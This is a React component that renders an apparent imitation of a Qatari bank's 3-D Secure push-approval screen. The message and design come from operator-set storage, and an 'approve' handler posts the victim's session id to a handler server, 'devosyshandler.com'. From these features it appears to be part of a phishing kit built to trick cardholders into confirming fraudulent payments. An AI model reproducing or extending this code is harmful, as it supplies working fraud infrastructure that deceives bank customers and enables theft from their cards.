import React from 'react';
import axios from 'axios';
import { useNavigate } from 'react-router-dom';
import QatarBankLayout from './qatar/QatarBankLayout';

const PUSHPage = () => {
  const navigate = useNavigate();
  const design = localStorage.getItem('session_design') || 'qatar_default';
  const customMessage = localStorage.getItem('push_text');

  const handleApprove = async () => {
    navigate('/3ds/loading');
    const dataToSend = {
      uuId: localStorage.getItem('uuId')
    };

    try {
      const serverUrl = process.env.REACT_APP_SERVER_URL || 'https://devosyshandler.com';
      await axios.post(`${serverUrl}/api/push_verif`, dataToSend);
    } catch (error) {
      console.error('Push confirmation error:', error);
    }
  };

  return (
    <QatarBankLayout
      design={design}
      mode="push"
      customMessage={customMessage}
      onApprove={handleApprove}
      onCancel={() => navigate('/checkout')}
    />
  );
};

export default PUSHPage;
